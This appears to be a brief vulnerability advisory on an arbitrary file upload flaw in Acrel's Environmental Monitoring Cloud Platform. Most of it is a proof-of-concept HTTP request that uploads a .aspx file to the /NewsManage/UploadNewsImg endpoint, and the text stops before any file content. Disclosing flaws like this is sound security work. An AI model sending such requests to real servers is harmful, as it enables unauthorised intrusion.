File Upload Vulnerability in Acrel - Environmental Monitoring Cloud Platform Affected Version: Acrel - Environmental Monitoring Cloud Platform ≤ all Vendor: https://ems.acrel.cn/ Software: Environmental Monitoring Cloud Platform Vulnerability Files: /NewsManage/UploadNewsImg Description: The /NewsManage/UploadNewsImg interface does not impose strict restrictions on uploaded files, resulting in a vulnerability that allows arbitrary file uploads. Proof of Concept: ``` POST /NewsManage/UploadNewsImg HTTP/1.1 Host: xx.xx.xx.xx Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept: / Content-Length: 186 ------WebKitFormBoundaryfjKBvGWJbG07Z02r Content-Disposition: form-data; name="file"; filename="test.aspx"